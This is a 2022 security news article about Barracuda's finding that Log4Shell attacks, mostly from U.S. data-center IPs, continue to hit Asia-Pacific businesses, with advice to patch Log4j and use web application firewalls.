SecurityBrief New Zealand - Technology news for CISOs & cybersecurity decision-makers
New Zealand
Guides
#
cloud security
#
cybersecurity
#
endpoint protection
#
firewall
#
ransomware
Search
Story image
#
AWS
#
Breach Prevention
#
Cloud Services
APAC businesses still battling U.S. Log4Shell attacks
Wed, 9th Mar 2022
FYI, this story is more than a year old
Author image
By Ryan Morris-Reade, Contributor
Follow us

Log4Shell attacks prove a continued and complex threat to APAC businesses, according to Barracuda. The company has found the injection bug is still leaving businesses in Asia-Pacific vulnerable to log injection attacks.

Log4Shell was first publicly disclosed in December 2021. It is a software vulnerability specifically targeting Log4j, a Java-based logging audit framework that is an Apache project. Log4j is an open source Java package used to support activity-logging in many popular Java applications.

The New Zealand CERT says, "Log4j has an unauthenticated RCE vulnerability if a user-controlled string is logged. This could allow the attacker full control of the affected server. Reports from online users show that this is being actively exploited in the wild, and that proof-of-concept code has been published."

While not all software written in Java is vulnerable, the affected package is widely used by developers across multiple organisations.

The vulnerability was given the highest severity rating possible when discovered, by the National Vulnerability Database, given the ease that malicious attackers can exploit it.

Since then, Barracuda researchers have been analysing the attacks and payloads detected and found the volume of attacks remains relatively constant and is unlikely to diminish any time soon. The company says the vulnerability allows a remote attacker to take control of a device on the internet if running specific versions of Log4j. Logging is a critical component of most applications and systems because it allows developers and system administrators to verify that software is working properly and identify more specific details when it is not.

The researchers also say they have made interesting insights into the location of the original attacks. The majority of attacks came from IP addresses in the U.S., and half of those were associated with AWS, Azure and other data centers. Attacks were also sent from Japan, Germany, Netherlands, and Russia.

"These were the IPs that performed scans and attempted intrusions. Actual payloads would have been delivered from other compromised websites or VPS hosts," says Barracuda senior product marketing manager, Applications and Cloud Security, Tushar Richabadas.

"Given the popularity of the software, the exploitability of the vulnerability and the payoff when a compromise happens, we expect to see this attack pattern continue, at least for the short term."

He says the best way to protect against Log4shell is to upgrade to the latest version of log4j. Maintaining up-to-date software and libraries helps ensure that vulnerabilities are patched. Given the growing number of vulnerabilities found in web applications, it is getting progressively more complex to protect against attacks.

However, Richabadas says all-in-one solutions are now available, including WAF/WAF-as-a-Service solutions, also known as Web Application and API Protection (WAAP) services, which can help protect web applications by providing all the latest security solutions.

Related stories
RiverSafe teams up with Cribl to boost IT & data security services
Business leaders anxious over data security – report
Half of online traffic in 2024 generated by bots, report finds
Cisco launches Hypershield for AI-driven security upgrade
Axis unveils hybrid cloud platform for adaptable security solutions
Top stories
Fortinet recognised as Challenger in Gartner's 2024 Magic Quadrant for SSE
Coalition integrates cyber risk platform with top cloud services providers
Armis warns of major cyber-attack risk to 2024 global elections
i-PRO to support Genetec SaaS with new AI-enabled camera models
Illumio unveils AI enhancements for faster Zero Trust Segmentation adoption